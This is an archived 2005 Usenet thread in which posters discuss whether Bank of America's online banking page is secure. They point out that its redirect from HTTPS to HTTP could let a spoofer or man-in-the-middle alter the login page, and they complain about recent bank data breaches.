Re: Bank of America - On Line Banking *NOT* Secure?

From: Mike Amling (nospam_at_nospam.com)
Date: 06/26/05 

Date: Sun, 26 Jun 2005 02:26:14 GMT

John E. Hadstate wrote:
> "Neil - Salem, MA USA" <Neil@Salem.Massachusetts.USA> wrote
> in message news:KdSdnVk_E_9LFCDfRVn-ig@comcast.com...
>
>>Could someone please check out Bank of America's web site
>>at http://www.bankofamerica.com and examine it for poor on
>>non-existent security?
>>
>>
>>"To provide the fastest access to our home page for all of
>>our millions of customers and other visitors, we have made
>>signing in to Online Banking secure without making the
>>entire page secure. Again, please be assured that your ID
>>and passcode are secure and that only Bank of America has
>>access to them."
>>
>>In other words, they are saying, "Trust us."
>
>
> You can still connect to https://www.bankofamerica.com/ but
> they immediately redirect you to
> http://www.bankofamerica.com/. From a cursory examination
> of the Javascript, it looks like the login information is
> submitted using an https connection to a cgi application.
>
> However small the probability, it appears that there is a
> security hole in the redirection to http. If someone else
> is spoofing the address www.bankofamerica.com, the page your
> browser loads may not be from BOA's servers. In this case,
> who knows what will happen when you enter a username and
> password. Hint: it probably won't be good for you.

   Yes, and a MITM could just alter the downloaded javascript without
having to spoof the DNS. Some firewalls, not to mention all ISPs, are
capable of monitoring and changing http content.

> BOA is playing with fire. They are the bank who recently
> compromised the private information of a million Federal
> employees, including a US Senator or two. Being a customer
> of BOA, and having just received a letter from Citibank that
> my private information has been compromised, and being a
> customer of Wachovia who also has been compromised, I'm
> pretty fed up myself. There is just no excuse for this kind
> of thing.

   I agree. Sounds like grist for Schneier's Cryptogram.

--Mike Amling

Relevant Pages

  • Re: Barclaycard are they right?
    ... and the bank / customer interactions would have a pretty clear 'steer' ... of how a court would handle the matter. ... the law is tilted lmost 100% in favour of the customer. ... Read sections 83 and 84 of the Act. ...
    (uk.legal)
  • Re: How to get money in Cancun, Mexico?
    ... I used it on BNP's ATM when I was in Paris and got very good exchange ... call Bank of America to ask their question regarding a Bank of America ... I'm the original customer service's customer from hell. ...
    (rec.travel.usa-canada)
  • Re: Barclaycard are they right?
    ... If the Ombudsman found fault with the ... bank and the bank refused to cooperate then the court is the next port ... prevent the customer using her clear rights under the Act. ...
    (uk.legal)
  • Re: Internet banking in Singapore is a JOKE
    ... If you stare too long at the screen for some reason, the bank logged ... I use internet banking to transfer money to the other people through their ... The bank requires the customer to create a record for each new payee ... The bank requires the customer to enter the IB Secure PIN for every ...
    (soc.culture.singapore)
  • Re: cip and PIN
    ... anyway) that the PIN was correctly input. ... way Andy has suggested and the customer has had to go to ... to prove that the bank are wrong. ... Alex Heney, Global Villager ...
    (uk.legal)